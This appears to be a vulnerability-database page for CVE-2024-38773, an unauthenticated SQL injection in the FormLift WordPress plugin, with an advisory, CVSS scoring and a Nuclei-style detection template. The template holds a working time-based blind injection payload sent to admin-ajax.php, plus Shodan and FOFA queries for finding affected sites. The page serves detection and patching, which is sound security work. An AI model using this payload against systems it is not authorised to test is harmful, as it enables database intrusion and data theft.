/Vulnerability Library

FormLift for Infusionsoft Web Forms <= 7.5.17 - SQL Injection

CVE-2024-38773
Verified

Description

The FormLift for Infusionsoft Web Forms plugin for WordPress is vulnerable to SQL Injection via the 'form_id' parameter in versions up to, and including, 7.5.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

10

Exploit Probability

38%

Published Date

March 9, 2026

Template Author

shivam kamboj

CVE-2024-38773.yaml
id: CVE-2024-38773

info:
  name: FormLift for Infusionsoft Web Forms <= 7.5.17 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The FormLift for Infusionsoft Web Forms plugin for WordPress is vulnerable to SQL Injection via the 'form_id' parameter in versions up to, and including, 7.5.17 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure or manipulation.
  remediation: |
    Update to the latest version of FormLift for Infusionsoft Web Forms.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formlift/formlift-for-infusionsoft-web-forms-7517-unauthenticated-sql-injection
    - https://patchstack.com/database/wordpress/plugin/formlift/vulnerability/wordpress-formlift-plugin-7-5-17-unauthenticated-blind-sql-injection-vulnerability
    - https://plugins.trac.wordpress.org/changeset?old_path=/formlift/tags/7.5.17&new_path=/formlift/tags/7.5.18&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38773
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2024-38773
    cwe-id: CWE-89
    epss-score: 0.37898
    epss-percentile: 0.97267
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="/wp-content/plugins/formlift/"
    shodan-query: html:"/wp-content/plugins/formlift/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,sqli,formlift

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "/formlift")'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=formlift_submit_form&form_id=0 UNION SELECT SLEEP(7)--

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 500'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100fa6b60d5e932b9d2a8189838fd2ea8ae9c46d60198ad587e4e5076e8b687e5ff02201674a1bcc8c7e2fefbff1d25759b68678b35dfbe16fac868c7971fa41f531f3f:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2024-38773
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formlift/formlift-for-infusionsoft-web-forms-7517-unauthenticated-sql-injectionhttps://patchstack.com/database/wordpress/plugin/formlift/vulnerability/wordpress-formlift-plugin-7-5-17-unauthenticated-blind-sql-injection-vulnerabilityhttps://plugins.trac.wordpress.org/changeset?old_path=/formlift/tags/7.5.17&new_path=/formlift/tags/7.5.18&sfp_email=&sfph_mail=https://nvd.nist.gov/vuln/detail/CVE-2024-38773

Remediation Steps

Update to the latest version of FormLift for Infusionsoft Web Forms.